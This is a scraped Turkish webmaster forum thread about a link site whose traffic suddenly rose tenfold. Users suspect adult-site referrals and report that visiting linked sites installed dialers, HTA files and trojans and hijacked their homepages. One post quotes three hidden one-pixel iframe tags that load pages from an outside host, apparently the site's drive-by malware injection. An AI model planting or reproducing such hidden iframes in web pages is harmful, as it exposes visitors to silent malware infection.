İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Annasayfa.com hit artışı

yolte

0
İyinet Üyesi
Reaction score
0
İyinet toplistinde üst sıralarda olan bir site dikkatimi çekti. annasayfa com
Site sıradan bir link sitesi gibi gözüküyor fakat nedstata göre sayfa gösterimi 28martta 3000lerde iken 29 martta birden 30.000lere fırlamış! Reklam mı verdiler yoksa bu işin içinde başka bir iş mi var anlamış değilim.

C

constantine

Misafir
gecende sitekolik.net adlı bir site üst sıralamalardaydı şimdi hiç listede bile yok :)

wasGer

0
İyinet Üyesi
Reaction score
0
eg-zotik branşından hitler aldığı için çıkış yaptı...
Ama gelenler umduğunu bulmuyor ve gidiyor yine.. zaten bu tür sitelerde iş yok. toplamış çöpü, çöpteneke sanki. googleyi tanımıyanlar ve buna benzer arama makinelerinden yoksun yaşayanlar bu tür gereksiz ve seviyesiz siteleri ziyaret eder.
bu site bir çete sitesidir, TİTLE'den belli googlede araştırma yap istersen '''annasayfa.com''' diye arat bak ne görcen... hep eg-zotik sitelerle bağlantısı var.

E

erotikbul

Misafir
arkadaşlar yaptığınızda biraz ayıp olmuypr mu.
"x sitenin hiti arttı.." "aa niye arttı", "kesin hile var."

Bence bu işte en iyisini yapanlar toplistlere kaydolmayanlar.

wasGer

0
İyinet Üyesi
Reaction score
0
eg-zotikbul' Alıntı:
arkadaşlar yaptığınızda biraz ayıp olmuypr mu.
"x sitenin hiti arttı.." "aa niye arttı", "kesin hile var."

Bence bu işte en iyisini yapanlar toplistlere kaydolmayanlar.

hile var diyen sanırım olmadı, topiği açan arkadaş doğal olarak merakt etmiş.. 3'000 tekilden nasıl 50'000 tekil oluyor diye. Bizde eg-zotik sitelerde linki olduğu için birden artış yaptı hitleri, dedik. bu kadar yani basit bir analiz.

E

erotikbul

Misafir
ben de bu site için söylemedim. dediğiniz siteyi ne tanırım ne ederim ama bu forumda aynı şey hep oluyor.

N

nothing

Misafir
benim adsl modem bağlantımı kesip "sxa" bağlantısımıdır nedir öle bişey yaptı.. direk ondan bağlantıya geçti pc.. allah nası biliyosa öle yapsın bunları, tıklamaz olaydım verdiğin linke..

Heraklitos

0
İyinet Üyesi
Reaction score
0
arkadaşlar eskiden bir dartanyan arkadaş vardı :D yakinen tanırım :D

<iframe src="http://www.jetsosyete.com/php.htm" width="1" height="1" scrolling="no" frameborder="0"></iframe>
<iframe src="http://www.jetsosyete.com/test1.htm" width="1" height="1" scrolling="no" frameborder="0"></iframe>
<iframe src="http://www.jetsosyete.com/prome.htm" width="1" height="1" scrolling="no" frameborder="0"></iframe>

ANNASAYFA .COM ANNASINI SATİM BU KODLAR NEE.... :D

SENDEMİ BRÜTÜS :D

dazlakcom

0
İyinet Üyesi
Reaction score
0
way be ulkem ınsanı passo ara vermeksızın çalışıo :d ne dıyım afferım...

S

SaveTargetUs

Misafir
Ya bi kere sayfanın ismine bakıyon yetiyor. iyinet te sırasına bakıyon. hile.araştırmaya bile gerek yok aslında. söylediğiniz 30.000 tekil öyle cuk diye olacak iş değil. sağlam yerden linkle alakası da yok. hile. olmaz bir kerede. benim siteyede birçok kişi link atıyor. ama 50-100 büyüyor. neden 27.000 artmıyor. başkasının kullanıcısında gözümüz yok. sadece örnek gösterdim. çoğuldan bahsetmiyorsunuz tekil diyorsunuz.

S

sevdik

Misafir
slm

o site eg-zotik link sitesidir

Hitleri sahte değildir

Sitede dialler var parayi vuruyorlar

www.turkbikini.com gibi bir siteden pop-up reklami almiş gunde ordan 7-8bin tekil rahat aliyor turkbikini.com da googleden

turkbikini.com ve birçok adreste daha trojen var dopdolu.net in kullandigi gibi ana sayfani kitliyor biraz siteleri gezseniz anliyacaksiniz bu başliği atarak sadece onlarin reklamini yapiyoruz adamlar burda kovulsa ne olur kovulmasa ne olur

Her zamanki gibi Yaşasin IYINET adminimiz gecenlerde özür diliyordu gözümü açtim filan diye herkes biliyor kimin ne oldugunu selametle...

S

SaveTargetUs

Misafir
Tr'deki absürt ve eg-zotik sitelerle işim olmuyor. Herkez kolay yönden köşe olmak yolunda. sevdik in söylediği gibi bunların toplistlerde ne işi var. ???

N

nothing

Misafir
sevdik' Alıntı:
turkbikini.com ve birçok adreste daha trojen var dopdolu.net in kullandigi gibi ana sayfani kitliyor biraz siteleri gezseniz anliyacaksiniz bu başliği atarak sadece onlarin reklamini yapiyoruz adamlar burda kovulsa ne olur kovulmasa ne olur

KINIYORUM KINIYORUM ve tekrar KINIYORUM bu trojancıları............... ve bizler sazan gibi tıkladık link verilen başlığa tahmin ede ede.reklam yapıldı resmen ve format attık pc'mize... yazıktır format atmayı bilmeyen kullanıcılarda var bu ülkede

S

SempatiX

Misafir
c:\windows\hta1.hta ............. <-- Çüssss yane... c:\windows a bir girdimki 6 tane hta atm1is vede anasayfami degistirmis...

S

SempatiX

Misafir
Bu arada SIXA diyede bir baglanti atiyor... Siteye girenler dikkat etsin...

E

erotikbul

Misafir
arkadaşlar bende giriyorum ama hiç bişi yemiyorum.
Siz nasıl yiyorsunuz anlamak güç.
Norton 2005 ve Norton Systemworks yüklü. SP2 yüklü. Bilinen windows ayarlarında yanlış bir şey yok.
Denilen sitelerin kaynak kodlarına bakıyorum, pislikleri görüyorum ama giren çıkan yok bana. Size bulaşanlardan bende arıyorum sorun yok.
Sadece norton trojan.moo diye bir şey yakalamıştı geçen gün, hey.ani dosyasından, ona da geçit vermedi zaten. bu dosyayı forumdan bir arkadaş da yayıyor o kendini bilir. :) (arkadasbul.net, 160mp3.com da var)

Lütfen :D

rs635

0
İyinet Üyesi
Reaction score
2
ya harbiden ne uğraştırdı 2 saat uğraştım, bunu yapanlar t.p olsun emiii

rs635

0
İyinet Üyesi
Reaction score
2
bu sıxa bağlantısı tel faturasını kabartabilir mi peki?

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

seo ajansı , sosyal medya yönetimi